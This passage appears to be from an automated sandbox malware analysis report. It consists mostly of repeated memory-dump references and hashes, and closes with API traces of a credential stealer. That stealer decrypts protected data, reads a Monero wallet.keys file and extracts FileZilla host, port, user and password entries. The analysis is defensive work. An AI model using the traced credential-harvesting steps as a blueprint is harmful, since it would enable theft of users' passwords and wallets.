                    • Instruction Fuzzy Hash: 7CA2E8F3A08204AFE3046E2DEC8576AF7E9EF94320F16853DE6C4C3744EA7598458697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %we}$F1z<$qyl
                    • API String ID: 0-2673106884
                    • Opcode ID: b16eb786b1aaefd85157349fc4ddd894da35bd4b0d7486372474ce153884e22c
                    • Instruction ID: dcb04b6e70e0229024fdf22e8c7c7b0915585d4fe44cf63907eef5d049e563e6
                    • Opcode Fuzzy Hash: b16eb786b1aaefd85157349fc4ddd894da35bd4b0d7486372474ce153884e22c
                    • Instruction Fuzzy Hash: 95423AF36082009FE704AE2DEC8567ABBEAEBD4320F2A453DE6C5C7744E93599018653
                    APIs
                    • CoCreateInstance.COMBASE(003CE118,00000000,00000001,003CE108,00000000), ref: 003C3758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003C37B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                    • Instruction ID: ab1bf2922a741208f6d4d9f76612c8c670de9a1100800aebc8b02b5e5642e6a0
                    • Opcode Fuzzy Hash: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                    • Instruction Fuzzy Hash: 6341E870A40A289FDB24DB58CC95F9BB7B5BB48702F4081D8E609EB2D0D7716E85CF50
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                    • LocalFree.KERNEL32(?), ref: 003B9BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 9890c5605488872011d8f464fc4170af2b927c138545bbfe509f0b7ed60da91f
                    • Instruction ID: 1b5e619cc62b7b3e995bef3fd926d4992ec4087e27e910fd284a76b7bc41690a
                    • Opcode Fuzzy Hash: 9890c5605488872011d8f464fc4170af2b927c138545bbfe509f0b7ed60da91f
                    • Instruction Fuzzy Hash: 0811F7B8A00209EFCB04DF94D985AAE77B5FF88300F104599E915A7350D774AE14CFA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: s>;$%rq]
                    • API String ID: 0-132130327
                    • Opcode ID: a4872c6f1c663052752f7e92335765bdef2c9431d8d822ffdcb9969853276278
                    • Instruction ID: 3843b012aa3a915ffcb3b465ac3ab913be439292b70affcbea532ea4b1515e53
                    • Opcode Fuzzy Hash: a4872c6f1c663052752f7e92335765bdef2c9431d8d822ffdcb9969853276278
                    • Instruction Fuzzy Hash: 1AB219F360C2049FE3046E2DEC8567ABBE5EF94720F1A893DEAC5C7744EA3558048697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: [s/:$xbo\
                    • API String ID: 0-4192486534
                    • Opcode ID: c2d0907b89404df6652bfb09146aace9043281135151e0379f6182ef5773db77
                    • Instruction ID: a6ebeba2d79c89e4b1406194280f226d97160a5b8bddd1ec3e9b6aa6320e0518
                    • Opcode Fuzzy Hash: c2d0907b89404df6652bfb09146aace9043281135151e0379f6182ef5773db77
                    • Instruction Fuzzy Hash: 97B229F3A086149FD3046E2DEC8566AFBE9EF94720F1A493DEAC4C3744E63598018797
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Z^YU
                    • API String ID: 0-2477682694
                    • Opcode ID: 48e8af79c6c1a9eb3c261bad9460f8320de504887004cff30c82a1c0df67b34e
                    • Instruction ID: ceb586f730445b47b59a63bc8efede2860c91e085ffd75e1963e26a2d67695f5
                    • Opcode Fuzzy Hash: 48e8af79c6c1a9eb3c261bad9460f8320de504887004cff30c82a1c0df67b34e
                    • Instruction Fuzzy Hash: 9061E6F3E182109BE3086A28DC4937AB7D6EB94321F2B463DE6C9477C8D97918458686
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 28fca9c690ebbe247bacb31369247475c86d569990eb75cab383fb895640a0fc
                    • Instruction ID: a3d1b7d01b2dc8307e66da55a4819c65a6dda7ddb415c7a0239be19d82675c80
                    • Opcode Fuzzy Hash: 28fca9c690ebbe247bacb31369247475c86d569990eb75cab383fb895640a0fc
                    • Instruction Fuzzy Hash: 0D6112B3E146204BE7586D79CC553AAB6D2ABC8320F2B463DDE89A77C4ED785C0583C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 376897ff4dcf1d68cfe2a250d4fb15551536a9b91ab19a9e1d404b4f2f51cf57
                    • Instruction ID: 0d62fd27195d491d02a29a5abd97dc1e0782bc835376fcb3be32fbb0932ae409
                    • Opcode Fuzzy Hash: 376897ff4dcf1d68cfe2a250d4fb15551536a9b91ab19a9e1d404b4f2f51cf57
                    • Instruction Fuzzy Hash: 0551D4F3A086009FE3086F29DC8577AB7E6EFC4310F1B853DDAC957784EA3918458686
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0c827200fb012acd4cbf842cc8c3c498c02a77c0a65873f57ec715cae318bd5d
                    • Instruction ID: 0447c8d430e673d9856f6245979e706be386075829d47a190f5536eb56807068
                    • Opcode Fuzzy Hash: 0c827200fb012acd4cbf842cc8c3c498c02a77c0a65873f57ec715cae318bd5d
                    • Instruction Fuzzy Hash: C141F0B2A187085BE3547E2CECC537AF7D5EB18310F0A463DDA8993B44ED39690086DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2862bef72abd1710ad72b85f6b9632ed0452c8ed203c25eb514692e82361c571
                    • Instruction ID: 68742e9f342e4ac7ef91112a29ec9a5109d834e7e214cd73473a7bdaf5ed1c5e
                    • Opcode Fuzzy Hash: 2862bef72abd1710ad72b85f6b9632ed0452c8ed203c25eb514692e82361c571
                    • Instruction Fuzzy Hash: 804163F3A186009FE304BF28D88577AF7E5EF94310F16493DD6D587384EA3984458B86
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8162153ec68700a8c636d00ec66b3181f537b4fcc9c58b17cd25a0c824044518
                    • Instruction ID: 60a6d5d664cab1601a03c1734239390ccdd7db5fdaffbd429578aab1c1ae0c7e
                    • Opcode Fuzzy Hash: 8162153ec68700a8c636d00ec66b3181f537b4fcc9c58b17cd25a0c824044518
                    • Instruction Fuzzy Hash: 22216FB240C308AFE701BE28DC857BABBE4EB58754F06092DE6D583750E675A900C687
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,003D0DBA,003D0DB7,003D0DB6,003D0DB3), ref: 003C0362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C0369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 003C0385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 003C03CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C03DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 003C0419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003C0463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C0532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003D0DB2), ref: 003C054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003C0562
                    • lstrcat.KERNEL32(?,profile: null), ref: 003C0571
                    • lstrcat.KERNEL32(?,url: ), ref: 003C0580
                    • lstrcat.KERNEL32(?,00000000), ref: 003C0593
                    • lstrcat.KERNEL32(?,003D1678), ref: 003C05A2
                    • lstrcat.KERNEL32(?,00000000), ref: 003C05B5
                    • lstrcat.KERNEL32(?,003D167C), ref: 003C05C4
                    • lstrcat.KERNEL32(?,login: ), ref: 003C05D3
                    • lstrcat.KERNEL32(?,00000000), ref: 003C05E6
                    • lstrcat.KERNEL32(?,003D1688), ref: 003C05F5
                    • lstrcat.KERNEL32(?,password: ), ref: 003C0604
